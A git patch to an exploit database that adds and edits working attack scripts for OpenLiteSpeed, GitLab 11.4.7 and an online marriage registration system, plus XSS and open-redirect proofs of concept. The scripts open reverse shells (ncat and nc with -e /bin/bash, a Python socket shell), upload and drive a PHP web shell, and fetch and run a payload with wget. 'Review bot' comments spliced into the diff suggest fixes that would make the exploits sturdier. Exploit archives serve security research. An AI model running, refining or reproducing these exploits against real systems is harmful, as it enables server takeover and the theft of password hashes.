From b96bdbcfa593249b592c2a3695ce9bb0f538d44b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 12 Feb 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-02-12
8 changes to exploits/shellcodes
Online Marriage Registration System 1.0 - Remote Code Execution
Online Marriage Registration System 1.0 - Remote Code Execution (1)
Gitlab 11.4.7 - Remote Code Execution
GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)
GitLab 11.4.7 - Remote Code Execution (Authenticated)
GitLab 11.4.7 - RCE (Authenticated)
GitLab 11.4.7 - RCE (Authenticated) (2)
Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)
Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)
PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
b2evolution 6.11.6 - 'redirect_to' Open Redirect
b2evolution 6.11.6 - 'tab3' Reflected XSS
Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
---
 exploits/multiple/webapps/49556.py | 142 ++++++++++++++++
 exploits/php/webapps/49553.txt | 19 +++
 exploits/php/webapps/49554.txt | 16 ++
 exploits/php/webapps/49555.txt | 16 ++
 exploits/php/webapps/49557.py | 79 +++++++++
 exploits/ruby/webapps/49263.py | 262 -----------------------------
 exploits/ruby/webapps/49334.py | 10 +-
 files_exploits.csv | 16 +-
 8 files changed, 287 insertions(+), 273 deletions(-)
 create mode 100755 exploits/multiple/webapps/49556.py
 create mode 100644 exploits/php/webapps/49553.txt
 create mode 100644 exploits/php/webapps/49554.txt
 create mode 100644 exploits/php/webapps/49555.txt
 create mode 100755 exploits/php/webapps/49557.py
 delete mode 100755 exploits/ruby/webapps/49263.py
diff --git a/exploits/multiple/webapps/49556.py b/exploits/multiple/webapps/49556.py
new file mode 100755
index 000000000..221317226
--- /dev/null
+++ b/exploits/multiple/webapps/49556.py
@@ -0,0 +1,142 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
+# Date: 26/1/2021
+# Exploit Author: Metin Yunus Kandemir
+# Discovered by: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+
+import requests
+import sys
+import urllib3
+from bs4 import BeautifulSoup
+
+"""
+Description:
+The "path" parameter has command injection vulnerability that leads to escalate privilege.
+OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
+extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
+Details: https://github.com/litespeedtech/openlitespeed/issues/217
+Example:
+Step-1:
+ubuntu@ubuntu:~$ cat /etc/shadow
+cat: /etc/shadow: Permission denied
+Step-2:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Step-3:
+ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
+[+] Authentication was successful!
+[+] Version is detected: OpenLiteSpeed 1.7.8
+[+] The target is vulnerable!
+[+] tk value is obtained: 0.98296300 1612966522
+[+] Sending reverse shell to 127.0.0.1:4444 ...
+[+] Triggering command execution...
+Step-4:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from 127.0.0.1 54534 received!
+cat /etc/shadow
+root:!:18620:0:99999:7:::
+daemon:*:17937:0:99999:7:::
+bin:*:17937:0:99999:7:::
+sys:*:17937:0:99999:7:::
+sync:*:17937:0:99999:7:::
+.
+.
+.
+"""
+
+def triggerCommandExec(target, s):
+ data = {"act" : "restart"}
+ trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
+ if trigger.status_code == 200:
+ print("[+] Triggering command execution...")
+ else:
+ print("[-] Someting went wrong!")
+
+def commandExec(tk, groupId, s, target):
+ data = {
+ "name" : "lsphp",
+ "address" : "uds://tmp/lshttpd/lsphp.sock",
+ "note" : "",
+ "maxConns" : "10",
+ "env" : "PHP_LSAPI_CHILDREN=10",
+ "initTimeout" : "60",
+ "retryTimeout" : "0",
+ "persistConn" : "1",
+ "pcKeepAliveTimeout" : "",
+ "respBuffer" : "0",
+ "autoStart" : "2",
+ "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",
+ "backlog" : "100",
+ "instances" : "1",
+ "extUser" : "root",
+ "extGroup" : groupId ,
+ "umask" : "",
+ "runOnStartUp" : "1",
+ "extMaxIdleTime" : "",
+ "priority" : "0",
+ "memSoftLimit" : "2047M",
+ "memHardLimit" : "2047M",
+ "procSoftLimit" : "1400",
+ "procHardLimit" : "",
+ "a" : "s",
+ "m" : "serv",
+ "p" : "ext",
+ "t" : "A_EXT_LSAPI",
+ "r" : "lsphp",
+ "tk" : tk
+ }
+ exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)
+
+ if exec.status_code == 200:
+ if exec.text == "Illegal entry point!":
+ print("[-] tk value is incorrect!")
+ sys.exit(1)
+ else:
+ print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
+ else:
+ print("[-] Something went wrong!")
+ sys.exit(1)
+
+ triggerCommandExec(target, s)
+
+def loginReq(target, username, password, groupId):
+ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+ s = requests.Session()
+ data = {"userid" : username , "pass" : password }
+ login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)
+
+ if login.status_code == 302:
+ print("[+] Authentication was successful!")
+ elif login.status_code == 200:
+ print("[-] Authentication was unsuccessful!")
+ sys.exit(1)
+ else:
+ print("[-] Connection error!")
+ sys.exit(1)
+
+ version = s.get("https://" + target + "/index.php")
+ versionSource = BeautifulSoup(version.text, "html.parser")
+ v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
+ print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
+ if v.split()[2] == "1.7.8":
+ print("[+] The target is vulnerable!")
+
+ #getting tk value
+ getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
+ source = BeautifulSoup(getTk.text, 'html.parser')
+ tk = source.find('input', {'name':'tk'}).get('value')
+ print("[+] tk value is obtained: "+tk)
+ commandExec(tk, groupId, s, target)
+
+def main(args):
+ if len(args) != 5:
+ print("usage: %s targetIp:port username password groupId " %(args[0]))
+ print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
+ sys.exit(1)
+ loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])
+
+if __name__ == "__main__":
+ main(args=sys.argv)
\ No newline at end of file
diff --git a/exploits/php/webapps/49553.txt b/exploits/php/webapps/49553.txt
new file mode 100644
index 000000000..b78838883
--- /dev/null
+++ b/exploits/php/webapps/49553.txt
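Review bot: `exec = s.post(...)` in commandExec shadows the builtin `exec`, and triggerCommandExec's failure message "Someting went wrong!" is misspelled where commandExec prints "Something went wrong!"; rename the local to `resp` and make the two messages identical. In loginReq the version check only prints "[+] The target is vulnerable!" when the parsed version equals 1.7.8 and then falls through to commandExec regardless, so the message is informational only; an `else:` branch such as `else: print("[-] Version %s is not 1.7.8, aborting" % v.split()[2]); sys.exit(1)` would make the check actually gate execution. `versionSource.find(...)` and `source.find('input', {'name':'tk'})` both return None on unexpected markup, which currently surfaces as an AttributeError traceback rather than one of the script's own error lines. The module docstring should also list requests, urllib3 and bs4 as third-party requirements, since nothing in the file declares them.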
@@ -0,0 +1,19 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://www.peel.fr/
+# Software Link: https://sourceforge.net/projects/peel-shopping/
+# Software: : PEEL SHOPPING 9.3.0
+# Vulnerability Type: Stored Cross-site Scripting
+# Vulnerability: Stored XSS
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
+# Vulnerable parameters: 'Address'
+# Payload used:
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
+)//%0D%0A%0d%0a//\x3csVg/\x3e
+
+# POC: in the same page where we injected payload click on the text box to edit the address.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
diff --git a/exploits/php/webapps/49554.txt b/exploits/php/webapps/49554.txt
new file mode 100644
index 000000000..2c54eb41b
--- /dev/null
+++ b/exploits/php/webapps/49554.txt
@@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
+# Date: 10/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE : CVE-2020-22840
+
+
+--------------------------Proof of Concept-----------------------
+
+
+1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
+2. The user will be redirected to Google.com or any other attacker controlled domain
+3. This can be used to perform malicious phishing campaigns on unsuspecting users
\ No newline at end of file
diff --git a/exploits/php/webapps/49555.txt b/exploits/php/webapps/49555.txt
new file mode 100644
index 000000000..d69ff844f
--- /dev/null
+++ b/exploits/php/webapps/49555.txt
@@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
+# CVE: CVE-2020-22839
+# Date: 10/02/2021
+# Exploit Author: Nakul Ratti, Soham Bakore
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+
+--------------------------Proof of Concept-----------------------
+
+Steps to Reproduce:
+
+1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
+2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
+3. The vulnerable parameter in this case is “tab3”.
\ No newline at end of file
diff --git a/exploits/php/webapps/49557.py b/exploits/php/webapps/49557.py
new file mode 100755
index 000000000..738fd2517
--- /dev/null
+++ b/exploits/php/webapps/49557.py
@@ -0,0 +1,79 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
+# Date: 10/02/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Xampp Server and Wamp Server
+# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
+# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami'
+# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123
+
+import os
+import sys
+import random
+import argparse
+import requests
+
+
+def get_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
+ parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+ parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
+ parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
+ my_args = parser.parse_args()
+ return my_args
+
+
+def login(url, mobile, password):
+ url = "%s/user/login.php"%(url)
+ payload = {'mobno':mobile, 'password':password, 'login':''}
+ req = requests.post(url, data=payload)
+ return req.cookies['PHPSESSID']
+
+
+def upload(url, cookie, file=None):
+ url = "%s/user/marriage-reg-form.php"%url
+ files = {'husimage': ('shell.php', "", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+ payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 
'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
+ req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
+ print('[+] PHP shell uploaded')
+
+
+def get_remote_php_files(url):
+ url = "%s/user/images"%(url)
+ req = requests.get(url)
+ php_files = []
+ for i in req.text.split(".php"):
+ php_files.append(i[-42:])
+ return php_files
+
+
+def exec_command(url, webshell, command):
+ url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
+ req = requests.get(url_r)
+ print("[+] Command output\n%s"%(req.text))
+
+
+def register(mobile, password, url):
+ url_r = "%s/user/signup.php"%(url)
+ data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
+ req = requests.post(url_r, data=data)
+ print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))
+
+
+if __name__ == "__main__":
+ args = get_args()
+ url = args.url
+ command = args.command
+ mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
+ password = "dante123" if args.password is None else args.password
+ if args.password is None or args.mobile is None:
+ register(mobile,password,url)
+ cookie = login(url, mobile, password)
+ initial_php_files = get_remote_php_files(url)
+ upload(url, cookie)
+ final_php_files = get_remote_php_files(url)
+ webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
+ exec_command(url,webshell,command)
\ No newline at end of file
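Review bot: `import os` and `import sys` are never used, and `upload` takes a `file=None` parameter and binds `req` that nothing reads; removing the two imports, the dead parameter and the unused assignment would leave the file lint-clean. `login` returns `req.cookies['PHPSESSID']` directly, so an unsuccessful login surfaces as a KeyError traceback instead of a message, and `webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")` raises IndexError when the two listings are identical; a guard such as `if 'PHPSESSID' not in req.cookies: raise SystemExit('[-] Login failed')` before the return, and a similar length check before indexing `[0]`, would turn both into readable failures. The fixed slice `i[-42:]` in get_remote_php_files is an undocumented magic number and deserves a comment like `# assumes listed filenames are 42 characters before ".php" — confirm against the listing`.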
diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py
deleted file mode 100755
index 792c682a8..000000000
--- a/exploits/ruby/webapps/49263.py
+++ /dev/null
@@ -1,262 +0,0 @@
-# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
-# Date: 15th December 2020
-# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
-# Software Link: https://about.gitlab.com/
-# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
-# Tested on: GitLab 11.4.7 CE
-# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
-
-import requests
-import re
-import warnings
-from bs4 import BeautifulSoup
-import sys
-import base64
-import urllib
-from random_words import RandomWords
-import argparse
-import os
-import time
-
-
-
-
-parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
-parser.add_argument('-U',help='GitLab Username')
-parser.add_argument('-P',help='Gitlab Password')
-parser.add_argument('-l',help='rev shell lhost')
-parser.add_argument('-p',help='rev shell lport ',type=int)
-args = parser.parse_args()
-
-
-username = args.U
-password = args.P
-lhost = args.l
-lport = args.p
-
-
-#Retrieve CSRF Token
-
-warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
-gitlab_url = "http://10.129.49.62:5080"
-request = requests.Session()
-print("[+] Retrieving CSRF token to submit the login form")
-time.sleep(1)
-page = request.get(gitlab_url+"/users/sign_in")
-html_content = page.text
-soup = BeautifulSoup(html_content,features="lxml")
-token = soup.findAll('meta')[16].get("content")
-
-
-print("[+] CSRF Token : "+token)
-time.sleep(1)
-
-
-#Login
-
-login_info ={
- "authenticity_token": token,
- "user[login]": username,
- "user[password]": password,
- "user[remember_me]": "0"
-}
-
-
-login_request = request.post(gitlab_url+"/users/sign_in",login_info)
-
-
-if login_request.status_code==200:
- print("[+] Login Successful")
- time.sleep(1)
-
-else:
-
- print("Login Failed")
- print(" ")
- sys.exit()
-
-
-
-
-#Exploitation
-
-print("[+] Running Exploit")
-time.sleep(1)
-print("[+] Using IPV6 URL 
'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
-time.sleep(1)
-
-ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
-
-
-r = RandomWords()
-project_name = r.random_word()
-project_url = '%s/%s/'%(gitlab_url,username)
-
-print("[+] Creating Project")
-time.sleep(1)
-print("[+] Project Name : "+project_name)
-time.sleep(1)
-
-print("[+] Creating Python Reverse Shell")
-time.sleep(1)
-
-
-python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
-
-
-os.system("touch shell.py")
-shell_file = open("shell.py","w")
-shell_file.write(python_shell)
-shell_file.close()
-
-
-print("[+] Reverse Shell Generated")
-time.sleep(1)
-
-print("[+] Start HTTP Server in current directory")
-
-
-print("Command : python3 -m http.server 80")
-time.sleep(2)
-
-http_server = raw_input("Continue (Y/N) : ")
-
-if (http_server=="N") or (http_server=="n"):
- print("Start HTTP Server before running exploit")
-
-elif (http_server=="Y") or (http_server=="y"):
-
-
-
- print("Run this script twice with options below to get SHELL!")
- print("")
- print("Option 1 : Download shell.py rev shell to server using wget")
- print("Option 2 : Execute shell.py downloaded previously")
-
- option = raw_input("Option (1/2) : ")
-
-
- if option=="1":
-
-
-
- reverse_shell= """\nmulti
- sadd resque:gitlab:queues system_hook_push
- lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
- exec
- exec
- exec\n""" %(lhost)
-
-
- project_page = request.get(gitlab_url+"/projects/new")
- html_content = 
project_page.text
- soup = BeautifulSoup(html_content,features="lxml")
- project_token = soup.findAll('meta')[16].get("content")
- namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
- urlencoded_token1 = project_token.replace("==","%3D%3D")
- urlencoded_token_final = urlencoded_token1.replace("+","%2B")
-
-
- payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
-
-
-
-
-
-
- proxies = {
- "http" : "http://127.0.0.1:8080",
- "https" : "https://127.0.0.1:8080",
- }
-
- cookies = {
- 'sidebar_collapsed': 'false',
- 'event_filter': 'all',
- 'hide_auto_devops_implicitly_enabled_banner_1': 'false',
- '_gitlab_session':request.cookies['_gitlab_session'],
- }
-
- headers = {
- 'Host': '10.129.49.31:5080',
- 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
- 'Accept-Language': 'en-US,en;q=0.5',
- 'Accept-Encoding': 'gzip, deflate',
- 'Referer': 'http://10.129.49.31:5080/projects',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Content-Length': '398',
- 'Connection': 'close',
- 'Upgrade-Insecure-Requests': '1',
- }
-
-
-
- #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
-
- response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
- print("[+] Success!")
- time.sleep(1)
- print("[+] Run Exploit with Option 2")
-
- elif option=="2":
-
- reverse_shell= """\nmulti
- sadd resque:gitlab:queues system_hook_push
- lpush resque:gitlab:queue:system_hook_push 
"{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
- exec
- exec
- exec\n"""
-
-
-
-
- project_page = request.get(gitlab_url+"/projects/new")
- html_content = project_page.text
- soup = BeautifulSoup(html_content,features="lxml")
- project_token = soup.findAll('meta')[16].get("content")
- namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
- urlencoded_token1 = project_token.replace("==","%3D%3D")
- urlencoded_token_final = urlencoded_token1.replace("+","%2B")
-
-
- payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
-
-
-
-
-
-
- proxies = {
- "http" : "http://127.0.0.1:8080",
- "https" : "https://127.0.0.1:8080",
- }
-
- cookies = {
- 'sidebar_collapsed': 'false',
- 'event_filter': 'all',
- 'hide_auto_devops_implicitly_enabled_banner_1': 'false',
- '_gitlab_session':request.cookies['_gitlab_session'],
- }
-
- headers = {
- 'Host': '10.129.49.31:5080',
- 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
- 'Accept-Language': 'en-US,en;q=0.5',
- 'Accept-Encoding': 'gzip, deflate',
- 'Referer': 'http://10.129.49.31:5080/projects',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Content-Length': '398',
- 'Connection': 'close',
- 'Upgrade-Insecure-Requests': '1',
- }
-
-
-
- #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
-
- 
response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
- print("[+] Success!")
- time.sleep(1)
- print("[+] Spawning Reverse Shell")
\ No newline at end of file
diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py
index 3f89b1cd5..f0e29ed1b 100755
--- a/exploits/ruby/webapps/49334.py
+++ b/exploits/ruby/webapps/49334.py
@@ -1,10 +1,10 @@
-# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
+# Exploit Title: GitLab 11.4.7 RCE (POC)
 # Date: 24th December 2020
-# Exploit Author: Sam Redmond
+# Exploit Author: Norbert Hofmann
+# Original Exploit Authors: Sam Redmond, Tam Lai Yin
 # Software Link: https://gitlab.com/
 # Environment: GitLab 11.4.7, community edition
 # CVE: CVE-2018-19571 + CVE-2018-19585
-# Version: 11.4.7
 #!/usr/bin/python3
@@ -26,7 +26,7 @@ username = args.u
 password = args.p
 gitlab_url = args.g + ":5080"
 local_ip = args.l
-local_port = args.p
+local_port = args.P
 session = requests.Session()
@@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}")
 form = """\nmulti
 sadd resque:gitlab:queues system_hook_push
- lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
+ lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
 exec
 exec
 exec\n"""
diff --git a/files_exploits.csv b/files_exploits.csv
index 31e8df392..e89ef55e2 100644
--- a/files_exploits.csv
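Review bot: The new `local_port = args.P` is only correct if the argparse setup, which lies outside this hunk, defines a `-P` option; the context line `password = args.p` two lines above shows the old `args.p` was reading the password into the port, but nothing visible confirms `-P` exists, and if it does not this line raises AttributeError. A short comment on the new line, `local_port = args.P  # -P is the listener port; -p is the password`, would stop the two single-letter options being confused again. The first hunk also leaves `#!/usr/bin/python3` below the header comments, where a shebang has no effect; either move it to line 1 or drop it.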
+++ b/files_exploits.csv
@@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port
 48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
 48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
 48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
-48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
+48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
 48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
@@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port
 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
-49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby,
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
-49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
-49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
@@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port
 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
 49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
 49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
